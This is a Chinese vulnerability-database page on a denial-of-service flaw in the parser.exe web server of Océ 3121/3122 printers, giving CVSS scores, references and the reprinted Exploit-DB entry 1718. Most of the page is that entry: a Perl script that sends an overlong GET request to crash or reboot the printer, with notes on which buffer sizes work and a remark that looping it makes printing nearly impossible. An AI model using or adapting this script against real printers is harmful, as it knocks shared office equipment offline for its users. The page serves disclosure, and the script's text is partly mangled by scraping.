发布时间 :2006-04-29 06:02:00
修订时间 :2012-08-06 00:00:00

[原文]parser.exe in Océ (OCE) 3121/3122 Printer allows remote attackers to cause a denial of service (crash or reboot) via a long request, possibly triggering a buffer overflow.

[CNNVD]Oce 3121/3122 parser.exe 打印机拒绝服务漏洞 (CNNVD-200604-550)


- CVSS (基础分值)

CVSS分值: 7.8 [严重(HIGH)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  XF  oce-printer-url-dos(26123)
(UNKNOWN)  BID  17715

- 漏洞信息

Oce 3121/3122 parser.exe 打印机拒绝服务漏洞
高危 缓冲区溢出
2006-04-29 00:00:00 2007-01-24 00:00:00

- 公告与补丁


- 漏洞信息 (1718)

OCE 3121/3122 Printer (parser.exe) Denial of Service Exploit (EDBID:1718)
hardware dos
2006-04-26 Verified
0 sh4d0wman
N/A [点击下载]
#OCE 3121/3122 Printer DoS Exploit
#By Herman Groeneveld aka sh4d0wman
#trancelover75 [AT]
#Description: the printer runs a webserver to provide various printing tasks from
#java enabled browsers. Input is being filtered for bad characters.
#However it is vulnerable to a long url request. This will either reboot or crash the device.
#On crash, the "system" led on the printer changes from green to orange. No further printing is done
#until somebody resets the printer by flipping the powerswitch. E675 error displayed in printer display.
#On reboot, printing resumes after the device has completed it's reboot cycle.
#Crash is hard to accomplish. Play with the buffer input size. 261 worked at my printer. 
#Values of 250/500/50000 are known to reboot the printer. No reliable size for crashing yet.
#Loop this exploit and printing will be nearly impossible. Tested: unhappy users. Not implemented. 
#If you test this on your device, pls let me know the result. I had just 1 printer to test it at ;)
#Discovered: 29/03/2006
#Target: tested against OCE 3121/3122 printer. 
#Vendor: (no response)

	use IO::Socket;

	if (@ARGV != 3)
	print "                                        			      \n";
	print "   	#OCE 3121/3122 Printer DoS Exploit#  		      \n";
	print "---------------------------------------------------------------\n";
	print " Usage: <target ip> <target port> <request length> \n";
	print " Example: 80 250 		              \n";
	print " Play with request length for reboot or crash effect. 	      \n\n";
	print "      	#Coded by sh4d0wman 31/03/2006#			      \n";

	$targetip =$ARGV[0]; #user input, no much fun in attacking is it?
	$targetport =$ARGV[1]; #user input since vendor might change this some day, unlikely though  :-)
	$reqlength = $ARGV[2]; #user input since different sizes give different results

	print "[-] OCE 3122 Printer DoS Exploit\n\n";
	print "[-] Target IP: ";
	print $targetip;
	print "\n[-] Connecting to target IP...\n";

$socket = IO::Socket::INET->new(
	Proto => "tcp",
	PeerAddr => "$targetip",
	PeerPort => "$targetport"); unless ($socket) { die "- Could not connect. Check IP & 		port. Hint: default port is 80!\n"}

print "[-] Connected to printer\n\n";

print "[-] Creating DoS request...\n";

$bufa='A'x$reqlength; #creating payload, length based on user input

print "[-] Sending request...\n\n";

print $socket "GET /parser.exe?".$bufa.".html"." HTTP/1.1\r\n\r\n";
	sleep 5; #Be advised! Printer reaction to exploit can take up to 30 sec. Pls, be patient...

print "[>]Attack completed! Printer in error state or rebooting.\n";

# [2006-04-26]

- 漏洞信息

Océ 3121/3122 Printer Web Server Overflow DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

Océ contains a flaw that may allow a remote denial of service. The issue is triggered due to an error in the built-in webserver when handling an overly long user-supplied URL, and will result in loss of availability for the platform.

- 时间线

2006-04-26 2006-03-29
2006-04-26 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者